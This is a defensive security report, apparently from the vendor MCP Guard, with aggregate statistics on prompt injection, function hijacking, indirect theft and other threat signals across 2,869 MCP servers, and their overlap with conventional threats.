MCP-Specific Threat Signals Across 2,869 Servers: What We Observed and What Remains Unproven
Out of 2,869 unique MCP servers, 228 servers (7.9%) showed MCP-specific threat signals. Prompt Injection, Function Hijacking, and PleaseFix Attack overlapped on the same 134 servers, while Indirect Theft was observed on 113 servers through a partly separate path. In this dataset, none of these signals were observed on their own; every detected case also showed conventional threat signals.
Terminology
| Term | Meaning |
|---|---|
| MCP-specific threat signal | A threat pattern observed in the context of AI-agent behavior or MCP interaction |
| Conventional threat signal | A threat pattern such as Shell RCE or SSRF that predates MCP |
| Co-occurrence | Multiple threat signals observed on the same server |
| Observation scope | The range directly covered by this dataset. Zero detections do not prove absence |
Lead
Did MCP and AI agents really introduce new attack surfaces? The useful way to approach that question is not through theory alone, but by asking where concrete threat signals were actually observed.
This report reviews six MCP-specific threat patterns across 2,869 unique MCP servers. The focus is on which patterns overlapped, how they related to conventional threats, and what still remains unproven.
Key Findings
- 228 servers (7.9%) showed at least one MCP-specific threat signal.
- Prompt Injection, Function Hijacking, and PleaseFix Attack were observed on the same 134 servers in this dataset.
- Indirect Theft was observed on 113 servers and was strongly associated with outbound transmission or cross-server relay.
- In this dataset, no server showed MCP-specific threat signals without also showing conventional threat signals.
- Servers with MCP-specific threat signals had a 58.8% BLOCK rate, compared with 32.7% for servers that showed only conventional threats.
- Tool Poisoning and Tool Name Collision had zero detections within the current observation scope.
Dataset
| Item | Value |
|---|---|
| Total population | 2,869 unique MCP servers |
| MCP-specific threat patterns tracked | 6 |
| Servers with at least one MCP-specific threat signal | 228 |
| Observation window | April 2026 |
Detection Status of MCP-Specific Threat Signals
| Threat Pattern | Detections | Detection Rate |
|---|---|---|
| Prompt Injection | 134 | 4.7% |
| PleaseFix Attack | 134 | 4.7% |
| Function Hijacking | 134 | 4.7% |
| Indirect Theft | 113 | 3.9% |
| Tool Poisoning | 0 | 0.0% |
| Tool Name Collision | 0 | 0.0% |
The first notable pattern is that the top three signals have identical counts.
Understanding what kind of capability cluster sat behind that overlap is the main question for this article.
The Three Signals That Overlapped on 134 Servers
Co-occurrence analysis produced the following results.
| Threat Pair | Co-occurring Servers |
|---|---|
| Prompt Injection + PleaseFix Attack | 134 |
| Prompt Injection + Function Hijacking | 134 |
| PleaseFix Attack + Function Hijacking | 134 |
In this dataset, the three signals were observed together on the same server group.
That overlap closely matched the 134 servers discussed in Part 4 that exposed dynamic code execution capability.
The correct takeaway is limited: in this dataset, the three signals concentrated around the same capability group.
That does not prove a universal law. It does indicate that when AI-agent interaction and execution-oriented capability converge on the same server, these three signals tended to emerge together.
Indirect Theft Also Appeared Through a Separate Path
Indirect Theft was observed on 113 servers.
It overlaps partly with the three-signal group, but not in the same shape.
| Comparison | Three-signal overlap group | Indirect Theft |
|---|---|---|
| Detections | 134 | 113 |
| Commonly associated capability | Dynamic code execution | Outbound transmission / cross-server relay |
| Overlap pattern | Same 134 servers | Partial overlap only |
Within the 113 Indirect Theft detections:
| Commonly Associated Capability | Servers | Percentage |
|---|---|---|
| Outbound transmission | 88 | 77.9% |
| Cross-server relay | 38 | 33.6% |
Some servers had both capabilities, so the totals exceed 113.
This matters because it shows that MCP-specific threat signals do not all arise through the same operational path. Even without code execution, outbound transmission or cross-server relay can create a different risk route.
Of the 134 servers with Prompt Injection, only 19 (14.2%) also showed Indirect Theft.
So Indirect Theft cannot be explained solely by the three-signal overlap group.
Relationship With Conventional Threats
| Server Category | Servers |
|---|---|
| Conventional threats only | 257 |
| MCP-specific threats only | 0 |
| Both | 228 |
| No threats | 2,384 |
In this dataset, zero servers showed MCP-specific threat signals alone.
This is not proof that MCP-specific threats must always be accompanied by conventional ones in every future dataset.
It does suggest that, here, the capabilities associated with MCP-specific signals also tended to create conventional attack surfaces at the same time.
Average threat counts across the 228 servers were:
| Metric | Value |
|---|---|
| Average total threats | 4.7 |
| Average MCP-specific threats | 2.3 |
| Average conventional threats | 2.4 |
The near-even split means that looking at only one side gives an incomplete view of actual exposure.
BLOCK Rate Comparison
| Server Category | Servers | BLOCK | BLOCK Rate |
|---|---|---|---|
| With MCP-specific threat signals | 228 | 134 | 58.8% |
| Conventional threats only | 257 | 84 | 32.7% |
Servers with MCP-specific threat signals showed a higher BLOCK rate.
However, it would be too strong to say the MCP-specific signals themselves directly caused that gap. A more defensible reading is that high-risk capabilities such as execution or outbound transmission were often present at the same time, and those broader capability clusters were strongly associated with BLOCK verdicts.
The Two Zero-Detection Patterns
| Threat Pattern | Detections | Likely Reason Within Current Scope |
|---|---|---|
| Tool Poisoning | 0 | Requires evaluating intent and manipulation inside tool definitions, which is harder to capture in simple aggregate analysis |
| Tool Name Collision | 0 | Depends on multi-server environments and is difficult to surface from single-server observation alone |
Zero detections do not mean the threats do not exist.
They more likely indicate that these patterns are harder to observe inside the current scope and single-server-centered dataset.
Why Conventional Tools Often Miss These Signals
MCP-specific threat signals are not typically assessed by conventional web security tooling. Three reasons stand out.
1. AI-agent mediation
Prompt Injection and PleaseFix Attack depend not only on user input, but on the chain from attacker input to AI-agent judgment to tool execution. Conventional tooling often does not model that full path.
2. MCP semantics
Function Hijacking and Tool Poisoning require understanding tool definitions together with how an AI agent interprets them. That falls outside the normal scope of generic WAF or SAST tooling.
3. Session context
Indirect Theft depends on the context of what data moves where. The same outbound transmission could be legitimate workflow behavior or suspicious exfiltration. That distinction often requires session-level understanding.
Limitations
- These detections indicate that threat-pattern preconditions were observed, not that attacks were actually executed.
- Zero detections for Tool Poisoning and Tool Name Collision are heavily influenced by the current observation scope.
- The finding that the same 134 servers carried the three-signal overlap is an observed fact in this dataset, not a guarantee about future populations.
- This is a snapshot based on 2,869 unique servers, not a complete census of the entire MCP ecosystem.
Conclusion
Out of 2,869 unique MCP servers, 228 showed MCP-specific threat signals.
Within that group, Prompt Injection, Function Hijacking, and PleaseFix Attack overlapped on the same 134 servers, while Indirect Theft also emerged through outbound transmission and cross-server relay.
The practical lesson is that MCP-specific and conventional threats should not be reviewed in isolation.
Security review needs to examine how AI-specific attack surfaces and conventional attack surfaces compound on the same server.
MCP Guard continuously tracks how MCP-specific and conventional threat signals overlap across MCP servers.